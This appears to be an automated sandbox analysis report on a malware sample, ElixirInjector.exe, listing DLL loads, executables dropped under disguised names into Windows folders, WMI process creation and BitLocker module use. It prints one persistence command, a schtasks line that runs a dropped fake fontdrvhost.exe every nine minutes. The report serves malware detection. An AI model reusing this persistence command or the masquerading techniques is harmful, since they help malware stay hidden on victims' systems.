Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll

Source: C:\Users\user\Desktop\ElixirInjector.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Directory created: C:\Program Files\7-Zip\fvXBwqYdGYPkplbuTcoXecCdP.exe			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Directory created: C:\Program Files\7-Zip\ad448380f74670			Jump to behavior

Source: ElixirInjector.exe

Static file information: File size 1968011 > 1048576

Source: ElixirInjector.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: ElixirInjector.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: ElixirInjector.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: ElixirInjector.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: ElixirInjector.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: ElixirInjector.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: ElixirInjector.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: ElixirInjector.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: ElixirInjector.exe

Source: ElixirInjector.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: ElixirInjector.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: ElixirInjector.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: ElixirInjector.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: ElixirInjector.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\ElixirInjector.exe

File created: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\__tmp_rar_sfx_access_check_4707203

Jump to behavior

Source: ElixirInjector.exe

Static PE information: section name: .didat

Source: C:\Users\user\Desktop\ElixirInjector.exe	Code function: 0_2_00F2F640 push ecx; ret	0_2_00F2F653
Source: C:\Users\user\Desktop\ElixirInjector.exe	Code function: 0_2_00F2EB78 push eax; ret	0_2_00F2EB96
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Code function: 5_2_00007FFD34673597 push ebp; iretd	5_2_00007FFD34673598
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Code function: 5_2_00007FFD34A68824 push cs; ret	5_2_00007FFD34A68887
Source: C:\Windows\Microsoft.NET\fvXBwqYdGYPkplbuTcoXecCdP.exe	Code function: 75_2_00007FFD34683597 push ebp; iretd	75_2_00007FFD34683598

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\System32\cmd.exe	Executable created and started: C:\Windows\Microsoft.NET\fvXBwqYdGYPkplbuTcoXecCdP.exe
Source: unknown	Executable created and started: C:\Windows\BitLockerDiscoveryVolumeContents\fvXBwqYdGYPkplbuTcoXecCdP.exe
Source: unknown	Executable created and started: C:\Windows\ShellComponents\cmd.exe

Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	File created: C:\Users\user\Desktop\uAazTYNi.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	File created: C:\Windows\ShellComponents\cmd.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	File created: C:\Users\user\Desktop\mPirFwXv.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	File created: C:\Users\user\Desktop\TxvLlrMg.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	File created: C:\Program Files\7-Zip\fvXBwqYdGYPkplbuTcoXecCdP.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	File created: C:\Users\user\Desktop\rCAqismj.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	File created: C:\Users\user\Desktop\BlUGSVrR.log	Jump to dropped file
Source: C:\Users\user\Desktop\ElixirInjector.exe	File created: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	File created: C:\Users\user\Desktop\DvqGSnXS.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	File created: C:\Windows\BitLockerDiscoveryVolumeContents\fvXBwqYdGYPkplbuTcoXecCdP.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	File created: C:\Users\user\Desktop\EbKwZRsK.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	File created: C:\Users\user\Desktop\wxCHpYcd.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	File created: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	File created: C:\Users\user\Desktop\VHSMlJrg.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	File created: C:\Windows\Microsoft.NET\fvXBwqYdGYPkplbuTcoXecCdP.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	File created: C:\Windows\ShellComponents\cmd.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	File created: C:\Windows\BitLockerDiscoveryVolumeContents\fvXBwqYdGYPkplbuTcoXecCdP.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	File created: C:\Windows\Microsoft.NET\fvXBwqYdGYPkplbuTcoXecCdP.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	File created: C:\Users\user\Desktop\TxvLlrMg.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	File created: C:\Users\user\Desktop\DvqGSnXS.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	File created: C:\Users\user\Desktop\BlUGSVrR.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	File created: C:\Users\user\Desktop\rCAqismj.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	File created: C:\Users\user\Desktop\uAazTYNi.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	File created: C:\Users\user\Desktop\EbKwZRsK.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	File created: C:\Users\user\Desktop\wxCHpYcd.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	File created: C:\Users\user\Desktop\mPirFwXv.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	File created: C:\Users\user\Desktop\VHSMlJrg.log	Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe

Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe'" /f

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
